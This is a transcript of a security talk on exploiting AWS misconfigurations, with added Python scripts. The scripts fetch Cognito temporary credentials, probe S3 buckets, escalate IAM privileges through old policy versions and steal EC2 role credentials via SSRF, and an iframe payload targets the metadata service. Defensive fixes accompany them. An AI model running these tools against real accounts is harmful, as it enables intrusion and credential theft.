Slide 1

AWS (Mis)configuration from attacker’s eye-view

Speaker: Kavisha Sheth

Slide 2

About me

● Security Analyst @Appsecco.
● Listed among the top security researchers of the nation by NCIIPC.
● Curious person.
● International speaker on cloud security, API security and modern web application security.

Slide 3

What’s it all about?

● AWS Cognito misconfigurations.
● S3 misconfigurations that attackers love.
● Misconfigured IAM policies.
● EC2 misconfigurations.
● How HTML injection can lead to AWS credentials.

Slide 4

AWS Cognito (Mis)configuration

Slide 5

How AWS Cognito works

https://docs.aws.amazon.com/cognito/latest/developerguide/what-is-amazon-cognito.html

Slide 6

User pools and federated identity pools

https://serverless-stack.com/chapters/cognito-user-pool-vs-identity-pool.html

1. The user authenticates against a user pool.
2. The user pool issues three JWTs to the user: an ID token, an access token and a refresh token.
3. The ID token is passed to the identity pool, which returns temporary AWS credentials for the role mapped to that identity provider.
4. The user can then call AWS services within that role’s permissions.

An identity pool can issue temporary AWS credentials for authenticated identities and, if enabled, for unauthenticated (guest) identities; each mode maps to its own IAM role.

Slide 7

What are the possible attack vectors?

● Misconfigured AWS Cognito attributes.
● Hard-coded identity pool ID.
● Cognito configured to allow self sign-up of new users.
● Identity pool ID present in HTTP responses.
● Over-liberal AWS permissions assigned to the Cognito roles.

Slide 8

Hard-coded identity pool ID: the identity pool ID is disclosed in an HTTP response.

Slide 9

How does disclosure of the app client ID, user pool ID, identity pool ID and region help an attacker, and how can it be exploited?

Slide 10

Fetching temporary credentials

A. Using a Python script: generate the temporary credentials with a Boto3 script.

B. Using Burp Suite: look for the following API calls in the application’s HTTP requests (the operation is named in the X-Amz-Target header) and replay them.
   1. Obtain an IdentityId from the IdentityPoolId. API call: AWSCognitoIdentityService.GetId
   2. Fetch temporary credentials for that IdentityId. API call: AWSCognitoIdentityService.GetCredentialsForIdentity

Slide 11

● Check whether the application unintentionally exposes functionality through a Cognito misconfiguration, for example a disclosed app client ID.
● Check whether a confirmation email containing the confirmation code is sent to an attacker-specified address.
● Check whether the account can be confirmed with the code received at that address.
● Check whether the application accepts the newly created user and returns tokens.
● With the access and ID tokens of that authenticated session, generate temporary AWS credentials for an authenticated identity.

What if access to unauthenticated identities is disabled? The authenticated path above still works: the self-registered user’s ID token is accepted by the identity pool.
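The Cognito path from the three previous slides as one script. This is an added example, not code from the talk. Only `extract_cognito_ids`, `region_of` and `logins_key` run offline; `fetch_temporary_credentials` and `self_register_and_login` need boto3 and network access. It assumes the target embeds its Cognito configuration in a JS or JSON response (the common Amplify pattern); `SAMPLE_RESPONSE` is constructed and every ID in it is made up.

```python
"""
Added example (not from the talk): harvest Cognito identifiers from a response,
then walk the unauthenticated (GetId -> GetCredentialsForIdentity) or the
self-sign-up (SignUp -> ConfirmSignUp -> InitiateAuth -> identity pool) path.
"""
import re
import sys

# Identifier formats documented by AWS: identity pool "<region>:<uuid>",
# user pool "<region>_<9 alphanumerics>", app client ID = 26 lowercase alphanumerics.
IDENTITY_POOL_RE = re.compile(r"\b([a-z]{2}-[a-z]+-\d):([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\b")
USER_POOL_RE = re.compile(r"\b([a-z]{2}-[a-z]+-\d)_([A-Za-z0-9]{9})\b")
APP_CLIENT_RE = re.compile(r"\b[a-z0-9]{26}\b")

# Constructed sample of an Amplify-style config leaking in a JS bundle (IDs are fake).
SAMPLE_RESPONSE = """
var awsmobile = {"aws_project_region": "us-east-1",
  "aws_cognito_identity_pool_id": "us-east-1:0f0a1b2c-3d4e-5f60-7a8b-9c0d1e2f3a4b",
  "aws_user_pools_id": "us-east-1_AbCdEfGhI",
  "aws_user_pools_web_client_id": "1h57kf5cpq17m0eml12example"};
"""


def extract_cognito_ids(body):
    """Pull identity pool, user pool and app client IDs out of a response body."""
    return {
        "identity_pool_ids": sorted({f"{r}:{u}" for r, u in IDENTITY_POOL_RE.findall(body)}),
        "user_pool_ids": sorted({f"{r}_{s}" for r, s in USER_POOL_RE.findall(body)}),
        "app_client_ids": sorted(set(APP_CLIENT_RE.findall(body))),
    }


def region_of(pool_id):
    """Both pool ID formats start with the region ('us-east-1:...' / 'us-east-1_...')."""
    return re.split(r"[:_]", pool_id, maxsplit=1)[0]


def logins_key(user_pool_id):
    """Key of the identity pool Logins map under which a user-pool ID token is passed."""
    return f"cognito-idp.{region_of(user_pool_id)}.amazonaws.com/{user_pool_id}"


def fetch_temporary_credentials(identity_pool_id, logins=None):
    """Slide 10: GetId, then GetCredentialsForIdentity. logins=None tries the
    unauthenticated (guest) role; pass {logins_key(pool): id_token} for the
    authenticated role. Both operations are unsigned, so no AWS keys are needed."""
    import boto3
    from botocore import UNSIGNED
    from botocore.config import Config

    ci = boto3.client("cognito-identity", region_name=region_of(identity_pool_id),
                      config=Config(signature_version=UNSIGNED))
    extra = {"Logins": logins} if logins else {}
    identity_id = ci.get_id(IdentityPoolId=identity_pool_id, **extra)["IdentityId"]
    creds = ci.get_credentials_for_identity(IdentityId=identity_id, **extra)["Credentials"]
    return identity_id, creds  # creds: AccessKeyId, SecretKey, SessionToken, Expiration


def self_register_and_login(user_pool_id, app_client_id, username, password, email):
    """Slide 11: sign up, confirm with the emailed code, authenticate. Needs an app
    client with self sign-up enabled, no client secret, and the USER_PASSWORD_AUTH
    flow allowed (otherwise the SRP flow has to be implemented)."""
    import boto3
    from botocore import UNSIGNED
    from botocore.config import Config

    idp = boto3.client("cognito-idp", region_name=region_of(user_pool_id),
                       config=Config(signature_version=UNSIGNED))
    idp.sign_up(ClientId=app_client_id, Username=username, Password=password,
                UserAttributes=[{"Name": "email", "Value": email}])
    code = input(f"confirmation code sent to {email}: ").strip()
    idp.confirm_sign_up(ClientId=app_client_id, Username=username, ConfirmationCode=code)
    auth = idp.initiate_auth(ClientId=app_client_id, AuthFlow="USER_PASSWORD_AUTH",
                             AuthParameters={"USERNAME": username, "PASSWORD": password})
    return auth["AuthenticationResult"]  # IdToken, AccessToken, RefreshToken


if __name__ == "__main__":
    # Pipe a saved response in, or fall back to the constructed sample.
    body = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_RESPONSE
    ids = extract_cognito_ids(body)
    print(ids)
    if "--live" in sys.argv:  # actually talk to Cognito (needs boto3 and network)
        for pool in ids["identity_pool_ids"]:
            print(pool, fetch_temporary_credentials(pool))
```

Run it as `python cognito_probe.py < saved_response.js`; add `--live` to try the guest role of each identity pool found. For the authenticated path, feed the `IdToken` returned by `self_register_and_login` to `fetch_temporary_credentials` as `{logins_key(user_pool_id): id_token}`.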

Slide 12

What can go wrong?

● Sensitive details in server responses, including the Cognito identity pool ID.
● Cognito configured to allow self sign-up of new users.
● Liberal AWS permissions on the Cognito roles that let an unauthenticated user reach sensitive AWS services.
● Improper validation of the identity ID, allowing temporary credentials to be fetched.

Slide 13

S3 (Mis)configuration

Slide 14

1. Allowing public access to the bucket.
2. Granting “Full control” to the Authenticated AWS Users group (that group means any AWS account, not just your own).
3. Attaching a bucket policy that grants read access to everyone.
4. Granting “Write” access to the “Everyone” group.
5. Forgetting to encrypt the AWS resource.

Slide 15

Finding S3 buckets

● Google search and Google dorks.
● Shodan and Censys.
● Certificate Transparency logs.
● OSINT discovery tools such as Sublist3r and Amass.
● Brute-forcing bucket names with one of the numerous bucket-finder scripts.
● GrayHat Warfare bucket search.
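A probe for the misconfigurations on the two previous slides, as an added example that is not code from the talk. `candidate_bucket_names` and `acl_findings` run offline; `probe_bucket` needs boto3 and network access. The two group URIs are AWS’s real grantee URIs for the “Everyone” and “Authenticated AWS Users” groups; `SAMPLE_ACL` and the `acme` bucket names are constructed.

```python
"""
Added example (not from the talk): generate bucket-name candidates, then check
each for anonymous listing and for ACL grants to the public groups.
"""
import itertools

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"            # "Everyone"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"  # any AWS account
GROUP_NAMES = {ALL_USERS: "Everyone", AUTH_USERS: "Authenticated AWS Users"}


def candidate_bucket_names(keyword, envs=("dev", "staging", "prod"),
                           suffixes=("assets", "backup", "logs", "uploads")):
    """Wordlist in the style of the bucket-finder scripts: the keyword alone,
    keyword plus an environment or purpose word, and keyword-env-purpose."""
    names = {keyword}
    for part in envs + suffixes:
        names.update({f"{keyword}-{part}", f"{part}-{keyword}", f"{keyword}.{part}"})
    for env, suffix in itertools.product(envs, suffixes):
        names.add(f"{keyword}-{env}-{suffix}")
    return sorted(names)


def acl_findings(acl):
    """Map a GetBucketAcl response onto the slide-14 findings: every grant to the
    Everyone or Authenticated AWS Users group is reported with its permission."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") != "Group":
            continue  # canonical-user grants are the owner's own, not a public exposure
        group = GROUP_NAMES.get(grantee.get("URI"))
        if group:
            findings.append(f"{group}: {grant['Permission']}")
    return findings


def probe_bucket(name):
    """Anonymous, read-only probe: does the bucket exist, can everyone list it,
    and what does its ACL grant to the public groups? A write check (upload a
    marker object, then delete it) belongs only in an authorised engagement."""
    import boto3
    from botocore import UNSIGNED
    from botocore.config import Config
    from botocore.exceptions import ClientError

    s3 = boto3.client("s3", config=Config(signature_version=UNSIGNED))
    result = {"bucket": name, "exists": False, "public_list": False, "acl": []}
    try:
        s3.head_bucket(Bucket=name)
    except ClientError as e:
        if e.response["Error"]["Code"] == "404":
            return result  # no such bucket
    result["exists"] = True  # 200, or 403 (exists but not anonymously readable)
    try:
        s3.list_objects_v2(Bucket=name, MaxKeys=1)
        result["public_list"] = True
    except ClientError:
        pass
    try:
        result["acl"] = acl_findings(s3.get_bucket_acl(Bucket=name))
    except ClientError:
        pass  # ACL not readable anonymously
    return result


SAMPLE_ACL = {  # constructed GetBucketAcl response showing findings 1, 2 and 4 of slide 14
    "Owner": {"ID": "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "0123456789abcdef"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
        {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "WRITE"},
        {"Grantee": {"Type": "Group", "URI": AUTH_USERS}, "Permission": "FULL_CONTROL"},
    ],
}

if __name__ == "__main__":
    import sys
    keyword = sys.argv[1] if len(sys.argv) > 1 else "acme"
    print("sample ACL:", acl_findings(SAMPLE_ACL))
    for bucket in candidate_bucket_names(keyword):
        print(probe_bucket(bucket) if "--live" in sys.argv else bucket)
```

The Authenticated AWS Users check is the one people get wrong: a grant to that group is reachable with credentials from any AWS account, so rerun `list_objects_v2` with your own account’s credentials (drop the `UNSIGNED` config) to confirm it.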

Slide 16

Publicly available Google dorks for S3 buckets

Slide 17

Example of a misconfigured S3 bucket leading to a data breach: https://sonraisecurity.com/blog/misconfigured-aws-s3-bucket-leads-to-data-breach/

Slide 18

How does a (mis)configured IAM policy let a least-privilege user gain admin-level access?

Slide 19

Overly permissive user policies

Slide 20

Approach

Slide 21

What went wrong?

1. The policy has multiple versions, and an older version is overly permissive.
2. That overly permissive policy version is therefore still present in the account.
3. The user is able to activate the overly permissive older version by setting it as the default version (iam:SetDefaultPolicyVersion).
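The escalation on the previous slide, as an added example that is not code from the talk. `allows_action` and `allows_everything` evaluate policy documents offline with a deliberately simplified IAM evaluator (Allow/Deny, action wildcards, `*` or exact-ARN resources, no Conditions); `find_permissive_version` needs boto3 and the IAM read permissions it lists. The two policy documents and the account ID are constructed.

```python
"""
Added example (not from the talk): find an admin-equivalent older version of a
customer-managed policy and, if asked, make it the default.
"""
import fnmatch


def _as_list(value):
    return value if isinstance(value, list) else [value]


def allows_action(document, action, resource="*"):
    """Simplified IAM evaluation: an explicit Deny wins; otherwise any matching Allow
    grants the action. Action patterns match case-insensitively ('iam:*',
    'iam:Set*'). Resource matches only as '*' or the exact ARN (no Conditions)."""
    decision = False
    for stmt in _as_list(document.get("Statement", [])):
        patterns = [a.lower() for a in _as_list(stmt.get("Action", []))]
        resources = _as_list(stmt.get("Resource", []))
        if not any(fnmatch.fnmatchcase(action.lower(), p) for p in patterns):
            continue
        if "*" not in resources and resource not in resources:
            continue
        if stmt.get("Effect") == "Deny":
            return False
        if stmt.get("Effect") == "Allow":
            decision = True
    return decision


def allows_everything(document):
    """Admin-equivalent: Action '*' on Resource '*', or 'iam:*' on '*' (one step away).
    Asking for the literal action '*' only matches a statement whose Action is '*'."""
    return allows_action(document, "*") or allows_action(document, "iam:*")


def find_permissive_version(policy_arn, set_default=False):
    """Walk every version of a customer-managed policy (IAM keeps up to five), return
    the first non-default version that is admin-equivalent and, if asked, make it
    the default. Needs iam:ListPolicyVersions, iam:GetPolicyVersion and, for the
    last step, iam:SetDefaultPolicyVersion on the policy ARN."""
    import boto3

    iam = boto3.client("iam")
    for version in iam.list_policy_versions(PolicyArn=policy_arn)["Versions"]:
        body = iam.get_policy_version(PolicyArn=policy_arn, VersionId=version["VersionId"])
        doc = body["PolicyVersion"]["Document"]  # boto3 returns it already decoded
        if allows_everything(doc) and not version["IsDefaultVersion"]:
            if set_default:
                iam.set_default_policy_version(PolicyArn=policy_arn, VersionId=version["VersionId"])
            return version["VersionId"]
    return None


POLICY_ARN = "arn:aws:iam::123456789012:policy/dev-policy"  # constructed

# Constructed: the default version (v2) looks least-privilege, except that it lets
# the user read and switch versions of its own policy ...
CURRENT_VERSION = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Resource": POLICY_ARN,
         "Action": ["iam:ListPolicyVersions", "iam:GetPolicyVersion", "iam:SetDefaultPolicyVersion"]},
        {"Effect": "Allow", "Action": "s3:ListBucket", "Resource": "*"},
        {"Effect": "Deny", "Action": "iam:Create*", "Resource": "*"},
    ],
}
# ... while the older v1 still stored in the account is full admin.
OLD_VERSION = {"Version": "2012-10-17",
               "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]}

if __name__ == "__main__":
    import sys
    for name, doc in (("v2 (default)", CURRENT_VERSION), ("v1", OLD_VERSION)):
        print(name, "admin-equivalent:", allows_everything(doc),
              "can SetDefaultPolicyVersion:", allows_action(doc, "iam:SetDefaultPolicyVersion", POLICY_ARN))
    if "--live" in sys.argv:  # against a real policy: python iam_versions.py --live <policy-arn> [--set]
        print(find_permissive_version(sys.argv[2], set_default="--set" in sys.argv))
```

The same walk by hand is `aws iam list-policy-versions --policy-arn <arn>`, `aws iam get-policy-version --policy-arn <arn> --version-id v1` and finally `aws iam set-default-policy-version --policy-arn <arn> --version-id v1`. The defensive check is the mirror image: alert on `SetDefaultPolicyVersion` in CloudTrail and delete old versions instead of leaving them dormant.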

Slide 22

EC2 (Mis)configuration

Slide 23

What to look for?

● Is the EC2 instance reachable from the public Internet?
● Which ports are open?
● Is a web application running on the instance’s IP address?
● Is a default configuration in use?

Slide 24

Finding EC2 instances

Slide 25

Web application running on port 80

Slide 26


Slide 27

S3-related permissions and sensitive information

Slide 28

Approach

Slide 29

What went wrong?

1. A misconfigured firewall (security group) left the EC2 instance publicly accessible.
2. The web application on the instance performs no input validation and trusts user-supplied data when making requests from the server, which makes it vulnerable to SSRF.
3. The EC2 instance role has an overly permissive policy.
4. Data stored in S3 was not encrypted.
5. Credentials, including admin credentials, were stored in an S3 bucket.
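The metadata-service step that the SSRF on the previous slide is steered towards (and that slide 34 returns to), as an added example that is not code from the talk. `fetch(url, headers)` stands for whatever the SSRF lets you send and must return `(status_code, body_text)`; `urllib_fetch` is the direct version for use from a shell on an instance, and the two `fake_*` functions are constructed stand-ins for IMDS so the harvest runs offline. The role name and every credential value in `FAKE_CREDS` are made up.

```python
"""
Added example (not from the talk): pull the instance role's temporary credentials
from IMDSv1 through an SSRF, and show why IMDSv2 stops a GET-only SSRF.
"""
import json
import urllib.error
import urllib.request

IMDS = "http://169.254.169.254"
ROLE_PATH = "/latest/meta-data/iam/security-credentials/"
TOKEN_PATH = "/latest/api/token"


def harvest_role_credentials(fetch, token=None):
    """IMDSv1: GET the role list, then GET that role's credential document.
    Returns (role_name, creds) or None. With IMDSv2 enforced the first GET gets a
    401 unless an X-aws-ec2-metadata-token header is present, and that token is
    only issued in response to a PUT, which a GET-only SSRF cannot send."""
    headers = {"X-aws-ec2-metadata-token": token} if token else {}
    status, body = fetch(IMDS + ROLE_PATH, headers)
    if status == 401:
        return None  # IMDSv2 required
    if status != 200 or not body.strip():
        return None  # no instance role attached (404), or not running on EC2
    role = body.strip().splitlines()[0]
    status, body = fetch(IMDS + ROLE_PATH + role, headers)
    if status != 200:
        return None
    return role, json.loads(body)


def as_env(creds):
    """Credential document fields -> the environment variables the AWS CLI and boto3 read."""
    return {"AWS_ACCESS_KEY_ID": creds["AccessKeyId"],
            "AWS_SECRET_ACCESS_KEY": creds["SecretAccessKey"],
            "AWS_SESSION_TOKEN": creds["Token"]}


def urllib_fetch(url, headers, method="GET"):
    """Plain HTTP client for running this directly on an instance (not through an SSRF)."""
    req = urllib.request.Request(url, headers=headers, method=method)
    try:
        with urllib.request.urlopen(req, timeout=2) as resp:
            return resp.getcode(), resp.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, ""
    except urllib.error.URLError:
        return 0, ""  # no metadata service reachable


def imdsv2_token():
    """The PUT IMDSv2 requires first; needs a client that controls method and headers."""
    status, body = urllib_fetch(IMDS + TOKEN_PATH, {"X-aws-ec2-metadata-token-ttl-seconds": "21600"}, "PUT")
    return body if status == 200 else None


def list_buckets_with(creds):
    """Slide 29, step 3 onwards: an over-permissive instance role then exposes S3."""
    import boto3
    env = as_env(creds)
    s3 = boto3.client("s3", aws_access_key_id=env["AWS_ACCESS_KEY_ID"],
                      aws_secret_access_key=env["AWS_SECRET_ACCESS_KEY"],
                      aws_session_token=env["AWS_SESSION_TOKEN"])
    return [b["Name"] for b in s3.list_buckets()["Buckets"]]


# Constructed stand-ins for the metadata service (all values are fake).
FAKE_CREDS = {"Code": "Success", "LastUpdated": "2021-06-01T10:00:00Z", "Type": "AWS-HMAC",
              "AccessKeyId": "ASIAEXAMPLEEXAMPLE00",
              "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
              "Token": "IQoJb3JpZ2luX2VjEXAMPLETOKEN", "Expiration": "2021-06-01T16:00:00Z"}


def fake_imdsv1(url, headers):
    if url == IMDS + ROLE_PATH:
        return 200, "demo-ec2-role\n"
    if url == IMDS + ROLE_PATH + "demo-ec2-role":
        return 200, json.dumps(FAKE_CREDS)
    return 404, ""


def fake_imdsv2_only(url, headers):
    if "X-aws-ec2-metadata-token" not in headers:
        return 401, ""
    return fake_imdsv1(url, headers)


if __name__ == "__main__":
    import sys
    fetch = urllib_fetch if "--live" in sys.argv else fake_imdsv1
    found = harvest_role_credentials(fetch, token=imdsv2_token() if "--live" in sys.argv else None)
    print("no IMDSv1 credentials" if found is None else (found[0], as_env(found[1])))
```

To drive this through an actual SSRF, replace `fetch` with a function that submits the URL to the vulnerable feature and returns what the server echoed back. The fix on the instance side is to require IMDSv2 (`aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required`), which turns the first request into the 401 that `fake_imdsv2_only` models.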

Slide 30

Other attack vectors worth looking for

● Public EBS snapshots.
● Public EC2 AMIs.
● Unencrypted AMIs.
● Use of the default VPC.
● EC2 instances placed in a public subnet.
● Unrestricted outbound access.
● EC2 reserved instance payment pending (an account-hygiene item from the same checklist).
● Sensitive ports left open without restrictions.

Slide 31

How can an attacker use HTML injection to get AWS credentials?

Slide 32

Write-up of the case: https://blog.appsecco.com/finding-ssrf-via-html-injection-inside-a-pdf-file-on-aws-ec2-214cc5ec5d90

Slide 33

Approach

Slide 34

What went wrong?

1. User-supplied data was consumed without output encoding or input sanitisation, making the application vulnerable to HTML injection; the injected HTML also confirmed that the application was vulnerable to SSRF.
2. The web application was hosted on AWS, so the SSRF was used to reach the EC2 instance metadata service and obtain a set of AWS access keys.
3. The EC2 metadata was accessible because the instance used IMDSv1.
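The rendering bug behind step 1 above, shown as the vulnerable snippet next to its fix. This is an added example, not code from the talk or from the linked write-up. The invoice template, the payload and the renderer stand-in are constructed; the IMDS URL is the real address an HTML-to-PDF engine running on EC2 would reach.

```python
"""
Added example (not from the talk): user input dropped into HTML that a PDF
renderer consumes, the escaped version, and a stand-in for the renderer that
lists which URLs it would fetch from the server's network position.
"""
import html
import re

TEMPLATE = "<html><body><h1>Invoice for {name}</h1><p>{address}</p></body></html>"


def render_unsafe(name, address):
    """The bug: untrusted values are interpolated into the HTML as-is."""
    return TEMPLATE.format(name=name, address=address)


def render_safe(name, address):
    """The fix: every untrusted value is HTML-escaped before interpolation, so
    '<iframe ...>' arrives at the renderer as text, not markup."""
    return TEMPLATE.format(name=html.escape(name, quote=True),
                           address=html.escape(address, quote=True))


# Elements whose src/href an HTML-to-PDF engine (wkhtmltopdf, headless Chrome, ...)
# fetches server-side while rendering.
FETCH_RE = re.compile(
    r"<(?:iframe|img|script|link|embed|object)\b[^>]*?\b(?:src|href)\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def urls_a_renderer_would_fetch(document):
    """Stand-in for the renderer: the URLs it would request. Any hit on
    169.254.169.254 is the HTML injection turning into SSRF against IMDS."""
    return FETCH_RE.findall(document)


# Payload in the style of the write-up: the metadata listing is rendered into the PDF.
PAYLOAD = ('<iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" '
           'width="800" height="600"></iframe>')

if __name__ == "__main__":
    for render in (render_unsafe, render_safe):
        doc = render(PAYLOAD, "1 Main St")
        print(f"{render.__name__}: renderer would fetch {urls_a_renderer_would_fetch(doc)}")
```

Escaping closes the injection, but the SSRF sink remains whenever the renderer is allowed to load remote resources; pair the fix with IMDSv2 and with a renderer configured to block network fetches (or run it without access to 169.254.169.254).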

Slide 35

Misconfigurations worth looking for

● Improper credential handling
● Instance misconfiguration
● S3 misconfiguration
● Access control misconfiguration
● Exposure of resources via the firewall
● Network security misconfiguration
● Insecure custom applications
● RDS misconfigurations

Slide 36

Tools that can help speed up the process

● ScoutSuite
● Prowler
● S3Inspector
● enumerate-iam
● bucket_finder
● Pacu
● aws_escalate

Slide 37

References

● https://aws.amazon.com/premiumsupport/knowledge-center/cognito-user-pools-identity-pools/
● https://docs.aws.amazon.com/cognito/latest/developerguide/what-is-amazon-cognito.html
● https://dev.to/cloudanix/top-13-aws-ec2-misconfigurations-to-avoid-in-2021-29
● https://notsosecure.com/hacking-aws-cognito-misconfigurations/
● https://andresriancho.com/wp-content/uploads/2019/06/whitepaper-internet-scale-analysis-of-aws-cognito-security.pdf
● https://blog.appsecco.com/finding-ssrf-via-html-injection-inside-a-pdf-file-on-aws-ec2-214cc5ec5d90
● https://github.com/appsecco/attacking-cloudgoat2

Slide 38

Thank you

https://www.linkedin.com/in/kavisha-sheth/
https://twitter.com/sheth_kavisha